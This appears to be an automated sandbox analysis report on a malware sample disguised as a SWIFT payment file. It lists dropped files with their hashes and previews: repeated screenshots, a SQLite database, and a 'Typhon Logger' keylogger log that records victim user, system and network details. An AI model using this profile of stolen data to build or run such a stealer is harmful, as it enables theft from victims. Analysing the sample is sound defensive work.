                                                                                      Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W.M.!.l7.~S....."SW.^..c......^s........u,-n....A..?.2.....l.(.?....7..~.q$.f..1\.q[.....oS:.gOY".....f-%.P.b.Z......../.....)f..9^v..H .....U.J.L4k)J..c...^...<...................T........y.....5..}......
                                                                                      Process:C:\Users\user\Desktop\SWIFT_USD_165092.exe
                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
                                                                                      Category:dropped
                                                                                      Size (bytes):84239
                                                                                      Entropy (8bit):7.89456284925432
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:CQy+UOvPrQ9aIECUEfcbTAIUPwJyUpT84jcw2nDdHADouwvYB1Wi+dC3e6Ij9nTI:gy3s9aOU0c4uIwydADo0bcj9I
                                                                                      MD5:F8BBE21BC63277A7F37EDD458A0630D8
                                                                                      SHA1:268A8BE6C9916CE0D9B785F6EA9961994CFCA9B1
                                                                                      SHA-256:D99B260C56E912DDC86BF4EC93E572ECAC1A6D2D0BC6BF07CF8BB1A4FC393D2C
                                                                                      SHA-512:07424F2E7CF25D5AAEF6D6F9E9724E3AB0DC3D51733E36A11864C8E0A3135695D4AB2F277A8BF6C0849C9F3A7A2F5BCDCA01FCD4646EDD6E5B2122EB6381AA0E
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W.M.!.l7.~S....."SW.^..c......^s........u,-n....A..?.2.....l.(.?....7..~.q$.f..1\.q[.....oS:.gOY".....f-%.P.b.Z......../.....)f..9^v..H .....U.J.L4k)J..c...^...<...................T........y.....5..}......
                                                                                      Process:C:\Users\user\Desktop\SWIFT_USD_165092.exe
                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
                                                                                      Category:dropped
                                                                                      Size (bytes):84239
                                                                                      Entropy (8bit):7.89456284925432
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:CQy+UOvPrQ9aIECUEfcbTAIUPwJyUpT84jcw2nDdHADouwvYB1Wi+dC3e6Ij9nTI:gy3s9aOU0c4uIwydADo0bcj9I
                                                                                      MD5:F8BBE21BC63277A7F37EDD458A0630D8
                                                                                      SHA1:268A8BE6C9916CE0D9B785F6EA9961994CFCA9B1
                                                                                      SHA-256:D99B260C56E912DDC86BF4EC93E572ECAC1A6D2D0BC6BF07CF8BB1A4FC393D2C
                                                                                      SHA-512:07424F2E7CF25D5AAEF6D6F9E9724E3AB0DC3D51733E36A11864C8E0A3135695D4AB2F277A8BF6C0849C9F3A7A2F5BCDCA01FCD4646EDD6E5B2122EB6381AA0E
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W.M.!.l7.~S....."SW.^..c......^s........u,-n....A..?.2.....l.(.?....7..~.q$.f..1\.q[.....oS:.gOY".....f-%.P.b.Z......../.....)f..9^v..H .....U.J.L4k)J..c...^...<...................T........y.....5..}......
                                                                                      Process:C:\Users\user\Desktop\SWIFT_USD_165092.exe
                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
                                                                                      Category:dropped
                                                                                      Size (bytes):84239
                                                                                      Entropy (8bit):7.89456284925432
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:CQy+UOvPrQ9aIECUEfcbTAIUPwJyUpT84jcw2nDdHADouwvYB1Wi+dC3e6Ij9nTI:gy3s9aOU0c4uIwydADo0bcj9I
                                                                                      MD5:F8BBE21BC63277A7F37EDD458A0630D8
                                                                                      SHA1:268A8BE6C9916CE0D9B785F6EA9961994CFCA9B1
                                                                                      SHA-256:D99B260C56E912DDC86BF4EC93E572ECAC1A6D2D0BC6BF07CF8BB1A4FC393D2C
                                                                                      SHA-512:07424F2E7CF25D5AAEF6D6F9E9724E3AB0DC3D51733E36A11864C8E0A3135695D4AB2F277A8BF6C0849C9F3A7A2F5BCDCA01FCD4646EDD6E5B2122EB6381AA0E
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W.M.!.l7.~S....."SW.^..c......^s........u,-n....A..?.2.....l.(.?....7..~.q$.f..1\.q[.....oS:.gOY".....f-%.P.b.Z......../.....)f..9^v..H .....U.J.L4k)J..c...^...<...................T........y.....5..}......
                                                                                      Process:C:\Users\user\Desktop\SWIFT_USD_165092.exe
                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
                                                                                      Category:dropped
                                                                                      Size (bytes):84239
                                                                                      Entropy (8bit):7.89456284925432
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:CQy+UOvPrQ9aIECUEfcbTAIUPwJyUpT84jcw2nDdHADouwvYB1Wi+dC3e6Ij9nTI:gy3s9aOU0c4uIwydADo0bcj9I
                                                                                      MD5:F8BBE21BC63277A7F37EDD458A0630D8
                                                                                      SHA1:268A8BE6C9916CE0D9B785F6EA9961994CFCA9B1
                                                                                      SHA-256:D99B260C56E912DDC86BF4EC93E572ECAC1A6D2D0BC6BF07CF8BB1A4FC393D2C
                                                                                      SHA-512:07424F2E7CF25D5AAEF6D6F9E9724E3AB0DC3D51733E36A11864C8E0A3135695D4AB2F277A8BF6C0849C9F3A7A2F5BCDCA01FCD4646EDD6E5B2122EB6381AA0E
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W.M.!.l7.~S....."SW.^..c......^s........u,-n....A..?.2.....l.(.?....7..~.q$.f..1\.q[.....oS:.gOY".....f-%.P.b.Z......../.....)f..9^v..H .....U.J.L4k)J..c...^...<...................T........y.....5..}......
                                                                                      Process:C:\Users\user\Desktop\SWIFT_USD_165092.exe
                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
                                                                                      Category:dropped
                                                                                      Size (bytes):84239
                                                                                      Entropy (8bit):7.89456284925432
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:CQy+UOvPrQ9aIECUEfcbTAIUPwJyUpT84jcw2nDdHADouwvYB1Wi+dC3e6Ij9nTI:gy3s9aOU0c4uIwydADo0bcj9I
                                                                                      MD5:F8BBE21BC63277A7F37EDD458A0630D8
                                                                                      SHA1:268A8BE6C9916CE0D9B785F6EA9961994CFCA9B1
                                                                                      SHA-256:D99B260C56E912DDC86BF4EC93E572ECAC1A6D2D0BC6BF07CF8BB1A4FC393D2C
                                                                                      SHA-512:07424F2E7CF25D5AAEF6D6F9E9724E3AB0DC3D51733E36A11864C8E0A3135695D4AB2F277A8BF6C0849C9F3A7A2F5BCDCA01FCD4646EDD6E5B2122EB6381AA0E
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W.M.!.l7.~S....."SW.^..c......^s........u,-n....A..?.2.....l.(.?....7..~.q$.f..1\.q[.....oS:.gOY".....f-%.P.b.Z......../.....)f..9^v..H .....U.J.L4k)J..c...^...<...................T........y.....5..}......
                                                                                      Process:C:\Users\user\Desktop\SWIFT_USD_165092.exe
                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
                                                                                      Category:dropped
                                                                                      Size (bytes):84239
                                                                                      Entropy (8bit):7.89456284925432
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:CQy+UOvPrQ9aIECUEfcbTAIUPwJyUpT84jcw2nDdHADouwvYB1Wi+dC3e6Ij9nTI:gy3s9aOU0c4uIwydADo0bcj9I
                                                                                      MD5:F8BBE21BC63277A7F37EDD458A0630D8
                                                                                      SHA1:268A8BE6C9916CE0D9B785F6EA9961994CFCA9B1
                                                                                      SHA-256:D99B260C56E912DDC86BF4EC93E572ECAC1A6D2D0BC6BF07CF8BB1A4FC393D2C
                                                                                      SHA-512:07424F2E7CF25D5AAEF6D6F9E9724E3AB0DC3D51733E36A11864C8E0A3135695D4AB2F277A8BF6C0849C9F3A7A2F5BCDCA01FCD4646EDD6E5B2122EB6381AA0E
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W.M.!.l7.~S....."SW.^..c......^s........u,-n....A..?.2.....l.(.?....7..~.q$.f..1\.q[.....oS:.gOY".....f-%.P.b.Z......../.....)f..9^v..H .....U.J.L4k)J..c...^...<...................T........y.....5..}......
                                                                                      Process:C:\Users\user\AppData\Roaming\svchost\svchost.exe
                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
                                                                                      Category:dropped
                                                                                      Size (bytes):84239
                                                                                      Entropy (8bit):7.89456284925432
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:CQy+UOvPrQ9aIECUEfcbTAIUPwJyUpT84jcw2nDdHADouwvYB1Wi+dC3e6Ij9nTI:gy3s9aOU0c4uIwydADo0bcj9I
                                                                                      MD5:F8BBE21BC63277A7F37EDD458A0630D8
                                                                                      SHA1:268A8BE6C9916CE0D9B785F6EA9961994CFCA9B1
                                                                                      SHA-256:D99B260C56E912DDC86BF4EC93E572ECAC1A6D2D0BC6BF07CF8BB1A4FC393D2C
                                                                                      SHA-512:07424F2E7CF25D5AAEF6D6F9E9724E3AB0DC3D51733E36A11864C8E0A3135695D4AB2F277A8BF6C0849C9F3A7A2F5BCDCA01FCD4646EDD6E5B2122EB6381AA0E
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W.M.!.l7.~S....."SW.^..c......^s........u,-n....A..?.2.....l.(.?....7..~.q$.f..1\.q[.....oS:.gOY".....f-%.P.b.Z......../.....)f..9^v..H .....U.J.L4k)J..c...^...<...................T........y.....5..}......
                                                                                      Process:C:\Users\user\AppData\Roaming\svchost\svchost.exe
                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
                                                                                      Category:dropped
                                                                                      Size (bytes):84239
                                                                                      Entropy (8bit):7.89456284925432
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:CQy+UOvPrQ9aIECUEfcbTAIUPwJyUpT84jcw2nDdHADouwvYB1Wi+dC3e6Ij9nTI:gy3s9aOU0c4uIwydADo0bcj9I
                                                                                      MD5:F8BBE21BC63277A7F37EDD458A0630D8
                                                                                      SHA1:268A8BE6C9916CE0D9B785F6EA9961994CFCA9B1
                                                                                      SHA-256:D99B260C56E912DDC86BF4EC93E572ECAC1A6D2D0BC6BF07CF8BB1A4FC393D2C
                                                                                      SHA-512:07424F2E7CF25D5AAEF6D6F9E9724E3AB0DC3D51733E36A11864C8E0A3135695D4AB2F277A8BF6C0849C9F3A7A2F5BCDCA01FCD4646EDD6E5B2122EB6381AA0E
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W.M.!.l7.~S....."SW.^..c......^s........u,-n....A..?.2.....l.(.?....7..~.q$.f..1\.q[.....oS:.gOY".....f-%.P.b.Z......../.....)f..9^v..H .....U.J.L4k)J..c...^...<...................T........y.....5..}......
                                                                                      Process:C:\Users\user\AppData\Roaming\svchost\svchost.exe
                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
                                                                                      Category:dropped
                                                                                      Size (bytes):84391
                                                                                      Entropy (8bit):7.895236454518409
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:CQy+UOvPrQ9aIECUEfcbTAIUPwJyUpT84jcw2nDdHADouwvYB1Wi+dCIFHPbR:gy3s9aOU0c4uIwydADo0k1R
                                                                                      MD5:83211BCFBB2C48F3D52B0E1C01453E3E
                                                                                      SHA1:0C834300BCCA6BDB7607577D472FEF41DC3565E8
                                                                                      SHA-256:4367CE34BE0E7CD8CB0AC2B2CDFE40E0A6444B5320D53628F4F615390B77C8B6
                                                                                      SHA-512:237F275CEC6512A31BC4CA453C8A0838D8B3F4CB9DE61D8F40A906B0EB1CDE8ED33479A2D6F613295D8586B6A09749A39453C73991510EA40796E6B6ED2DE29D
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W.M.!.l7.~S....."SW.^..c......^s........u,-n....A..?.2.....l.(.?....7..~.q$.f..1\.q[.....oS:.gOY".....f-%.P.b.Z......../.....)f..9^v..H .....U.J.L4k)J..c...^...<...................T........y.....5..}......
                                                                                      Process:C:\Users\user\AppData\Roaming\svchost\svchost.exe
                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
                                                                                      Category:dropped
                                                                                      Size (bytes):84391
                                                                                      Entropy (8bit):7.895236454518409
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:CQy+UOvPrQ9aIECUEfcbTAIUPwJyUpT84jcw2nDdHADouwvYB1Wi+dCIFHPbR:gy3s9aOU0c4uIwydADo0k1R
                                                                                      MD5:83211BCFBB2C48F3D52B0E1C01453E3E
                                                                                      SHA1:0C834300BCCA6BDB7607577D472FEF41DC3565E8
                                                                                      SHA-256:4367CE34BE0E7CD8CB0AC2B2CDFE40E0A6444B5320D53628F4F615390B77C8B6
                                                                                      SHA-512:237F275CEC6512A31BC4CA453C8A0838D8B3F4CB9DE61D8F40A906B0EB1CDE8ED33479A2D6F613295D8586B6A09749A39453C73991510EA40796E6B6ED2DE29D
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W.M.!.l7.~S....."SW.^..c......^s........u,-n....A..?.2.....l.(.?....7..~.q$.f..1\.q[.....oS:.gOY".....f-%.P.b.Z......../.....)f..9^v..H .....U.J.L4k)J..c...^...<...................T........y.....5..}......
                                                                                      Process:C:\Users\user\AppData\Roaming\svchost\svchost.exe
                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
                                                                                      Category:dropped
                                                                                      Size (bytes):76603
                                                                                      Entropy (8bit):7.743716309042433
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:CQKkKBbKeEIL9Pg+Pyh4207/tJRcmQTAlJ9Lxx8iU5bbkM:0kK1vLBdPy6QTAl1LoT
                                                                                      MD5:2EBAC2D514354900CD36D5ACF637E8BA
                                                                                      SHA1:BDD60D4D7619439A33B8B8ADA765E50C450DFB5E
                                                                                      SHA-256:AD48C8346FCDCDEA6B275AA8C0D67E910AB2A3DE134B38CB7C14E21E058916B3
                                                                                      SHA-512:118CF8B43FF985335BBC219DD1E0336DB99250E3AC9E362DAE05C60C6AA75DFE80C808ACA8567E54E8EBC34959096CCBEA8FE933F1F461001BFCD56FA3BC7F55
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W.M.!.l7.~S....."SW.^..c......^s........u,-n....A..?.2.....l.(.?....7..~.q$.f..1\.q[.....oS:.gOY".....f-%.P.b.Z......../.....)f..9^v..H .....U.J.L4k)J..c...^...<...................T........y.....5..}......
                                                                                      Process:C:\Users\user\AppData\Roaming\svchost\svchost.exe
                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
                                                                                      Category:dropped
                                                                                      Size (bytes):84391
                                                                                      Entropy (8bit):7.895236454518409
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:CQy+UOvPrQ9aIECUEfcbTAIUPwJyUpT84jcw2nDdHADouwvYB1Wi+dCIFHPbR:gy3s9aOU0c4uIwydADo0k1R
                                                                                      MD5:83211BCFBB2C48F3D52B0E1C01453E3E
                                                                                      SHA1:0C834300BCCA6BDB7607577D472FEF41DC3565E8
                                                                                      SHA-256:4367CE34BE0E7CD8CB0AC2B2CDFE40E0A6444B5320D53628F4F615390B77C8B6
                                                                                      SHA-512:237F275CEC6512A31BC4CA453C8A0838D8B3F4CB9DE61D8F40A906B0EB1CDE8ED33479A2D6F613295D8586B6A09749A39453C73991510EA40796E6B6ED2DE29D
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W.M.!.l7.~S....."SW.^..c......^s........u,-n....A..?.2.....l.(.?....7..~.q$.f..1\.q[.....oS:.gOY".....f-%.P.b.Z......../.....)f..9^v..H .....U.J.L4k)J..c...^...<...................T........y.....5..}......
                                                                                      Process:C:\Users\user\Desktop\SWIFT_USD_165092.exe
                                                                                      File Type:ASCII text, with CRLF, LF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1272
                                                                                      Entropy (8bit):4.711956036458964
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:neSAfBxfJBO4cI7Nm7NIHKsOWrcmQDPb8RfUsP/eblVf/VtNNNUp:eS+jrO4hc2HXAmQDQRRPWblVFtNNNC
                                                                                      MD5:DBEFB28EF32E7934248E8DD07C90C8FF
                                                                                      SHA1:6D9FC5184DE80F1E48EAD9CA6E74D9029CD174C4
                                                                                      SHA-256:4856BD494B5638206BE463CC83836C9F18321DAC90FF154E374BF279DA748C9A
                                                                                      SHA-512:3172E7FA038F9694AF4E096C42B647A1A8EDC541F5D3F7B537CB8332474F3448643D3AED948DDF4EA9BC4E0B6DBE5585DEED56075802BD5EDDD0964BBAED83C1
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:|===========================================|..| Typhon Logger V1 |..| One of the best keyloggers on the market |..| Coded by: lernaean_hydra0 & StopDropNLoad |..| By the developers of Typhon-R Stealer |..|===========================================|...============ User Info ============..User Name = user..Machine Name = 128757..Current Language = English (United States)..Installed Languages = English (United States); ...Current Date = 22.05.2023 21:41:22..===================================...=========== System Info ============..HWID = 1B269386E0..System Version = Windows 10 Pro x64..Processor = Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz..Graphics card = 49_9YZLW..Memory amount = 4095MB..Anti-Virus = Windows Defender...Battery status = NoSystemBattery, (1%)..Screen size = 1280x1024....=========== Network Info ============..Public IP = 84.17.52.45..Private IP = No network adapters with an IPv4 addr
                                                                                      Process:C:\Users\user\Desktop\SWIFT_USD_165092.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):612
                                                                                      Entropy (8bit):5.33730556823153
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:Q3La/hhkvoDLI4MWuCqDLI4MWuPk21xzAbDLI4M9XKbbDLI4MWuPJKiUrRZ9I0Z7:MLUE4K5E4Ks2vsXE4qXKDE4KhK3VZ9p7
                                                                                      MD5:F06804B809C3212C7F29ABA89E9FAF16
                                                                                      SHA1:B49ED216A41EA579FF109A4BA44A8E62C2B1A3BB
                                                                                      SHA-256:E63AFB84BF09F02C3C19978966E610BEE5C14099B1A65C8B34E426ABC127ECB7
                                                                                      SHA-512:53ED48D5233FD6318320264400ACBD451A7C6B10BB2A11C2B95F51C3838708835D1016B417748E7C50023BAF179AC94CCAAE230C71AC073D0233765409341D49
                                                                                      Malicious:true
                                                                                      Reputation:unknown
                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..
                                                                                      Process:C:\Users\user\AppData\Roaming\svchost\svchost.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):612
                                                                                      Entropy (8bit):5.33730556823153
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:Q3La/hhkvoDLI4MWuCqDLI4MWuPk21xzAbDLI4M9XKbbDLI4MWuPJKiUrRZ9I0Z7:MLUE4K5E4Ks2vsXE4qXKDE4KhK3VZ9p7
                                                                                      MD5:F06804B809C3212C7F29ABA89E9FAF16
                                                                                      SHA1:B49ED216A41EA579FF109A4BA44A8E62C2B1A3BB
                                                                                      SHA-256:E63AFB84BF09F02C3C19978966E610BEE5C14099B1A65C8B34E426ABC127ECB7
                                                                                      SHA-512:53ED48D5233FD6318320264400ACBD451A7C6B10BB2A11C2B95F51C3838708835D1016B417748E7C50023BAF179AC94CCAAE230C71AC073D0233765409341D49
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..
                                                                                      Process:C:\Users\user\Desktop\SWIFT_USD_165092.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):94208
                                                                                      Entropy (8bit):1.287139506398081
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:Qo1/8dpUXbSzTPJPF6n/YVuzdqfEwn7PrH944:QS/indc/YVuzdqfEwn7b944
                                                                                      MD5:292F98D765C8712910776C89ADDE2311
                                                                                      SHA1:E9F4CCB4577B3E6857C6116C9CBA0F3EC63878C5
